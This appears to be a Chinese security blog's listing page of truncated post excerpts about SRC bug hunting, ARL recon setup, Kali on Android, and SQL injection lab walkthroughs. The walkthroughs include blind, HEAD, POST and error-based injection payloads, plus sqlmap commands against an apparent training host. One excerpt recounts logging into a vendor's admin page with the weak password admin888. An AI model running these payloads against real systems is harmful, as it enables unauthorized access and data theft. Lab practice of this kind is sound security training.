踩坑SRC挖掘利器—ARL资产侦察灯塔系统安装教程
文章参考地址https://www.77169.net/download/267781.html本地搭建:Kali虚拟机先参考kali安装Docker文章地址:https://docs.docker.com/engine/install/debian/第一步kali安装Docker卸载旧版本更新apt软件包索引并安装软件包以允许apt通过HTTPS使用存储库:sudo apt-get updat
补天公益SRC厂商的弱口令
看到这个页面的提示想到了弱口令爆破但我尝试了下admin888直接就登入了但我用我主机登录后登入不了,我想他应该知道我登录。我直接提交上去不知道能不能过
手机安装kali踩过的坑
手机版kali使用时有一定的限制安装要用到的工具都是在谷歌商店里下载1: termux linux2: AndroNix 4.03: vnc viewer安装步奏打开AndroNix 4.0后找到kali图标,按照提示安装就可以了点击复制后,再点击termux安装完成后,终端输入./start-kali.sh返回AndroNix再复制安装图型界面安装vim 更改更新源vim /etc/apt/so
第一次尝试手机安装kali后首次提交漏洞
手机安装kali教程请看博客http://www.tuicool.com/articles/BzQ7BbB如有侵权请告知手机版kali使用时有一定的限制安装要用到的工具都是在谷歌商店里下载1: termux linux2: AndroNix 4.03: vnc viewer安装步奏打开AndroNix 4.0后找到kali图标,按照提示安装就可以了点击复制后,再点击termux安装完成后,终端
盲注和延时注入题解之手工做题
盲注靶场 用到ascii码表and 1=1 有数据 and 1=2 没有数据猜解数据库长度 数据库长度是12and length(database())>11 -- qwe 有数据and length(database())>12 -- qwe 没有数据and length(database())=12 -- qwe 有数据说明数据库长度是12用ascii码截取数据库的值
HEAD注入之手工注入
原谅我不会插入图片,写得不好勿喷HEAD手工注入要安装 浏览器扩展工具ModHeader 添加User-Agent 在User-Agent的值加入' or sleep(5),1) 登录后看会不会报错,报错就代表语句执行成功了,就存在SQL注入。如果做头注入用and的话后面的语句就不会执行,建议用or 用到一个函数 updatexmlupdatexml(目标xml内容,xml文档路径
HEAD注入之SQLMAP
HEAD注入条件是知道用户名密码或登录状态HEAD注入一般出现在请求头部分如 User-Agent 先抓包POST /Pass-07/index.php HTTP/1.1Host: 59.63.200.79:8815User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72
POST手工注入解题
在登陆框中输入万能密码登录,成功登录。想个问题是不是可以在登陆框中注入?' or 1=1#查字段1' or 1=1 order by 3#当 1' or 1=1 order by 4#时报错了,证明有3个字段找输出点1' union select 1,2,3#查库名 假设库名是post_er1' union select 1,2,database()#查表名 得到表名 f
POST注入之sqlmap
POST注入方法一加--form跑数据库 sqlmap.py -u http://59.63.200.79:8815/Pass-05/index.php --form --dbs跑出数据库后查询表名 假设库名是errorsqlmap.py -u http://59.63.200.79:8815/Pass-05/index.php --form --dbs -D error --tabl
显错注入题解1
sql的核心注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件:第一个是用户能够控制输入第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行判断注入点最简单的方法: 页面后面加',看是否报错 报错就存在注入1. [1](http://111 "1")[![1](C:\Users\weido\Desktop "